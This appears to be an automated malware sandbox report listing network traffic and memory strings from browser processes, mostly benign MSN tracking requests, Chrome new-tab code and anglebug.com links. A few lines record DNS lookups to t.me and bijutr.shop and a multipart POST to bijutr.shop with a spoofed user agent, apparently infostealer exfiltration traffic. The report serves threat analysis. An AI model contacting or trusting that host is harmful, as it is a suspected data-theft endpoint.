                Source: global trafficHTTP traffic detected: GET /b2?rn=1735064913991&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=302665E99E416E3C182470B69FCB6F6B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=100b66b45e7bac3f3b14d5f1735064915; XID=100b66b45e7bac3f3b14d5f1735064915
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735064913990&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=25e0b3e5ef394e87be94b037e6030b83&activityId=25e0b3e5ef394e87be94b037e6030b83&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B84458BB52864B9C8B94F9F4ABBF5707&MUID=302665E99E416E3C182470B69FCB6F6B HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; SM=T
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log3.27.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log3.27.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log3.27.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000003.2736411447.0000278000F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2736502374.0000278000F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2736290774.00002780003D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000012.00000003.2736411447.0000278000F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2736502374.0000278000F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2736290774.00002780003D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000012.00000002.2809276901.00002780002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: NsxXzupCMoDsL.NsxXzupCMoDsL
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: bijutr.shop
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: global trafficDNS traffic detected: DNS query: c.msn.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----3E3OP8QIMOZUAIMOHVS2User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 00000012.00000002.2810771573.00002780006D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078E
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205)
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502H
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/35867
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722M
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2874337334.0000266000300000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2975447168.000074F40257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 00000012.00000003.2733132889.0000278000898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2733047041.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732571748.00002780003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2976240411.000074F40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901K
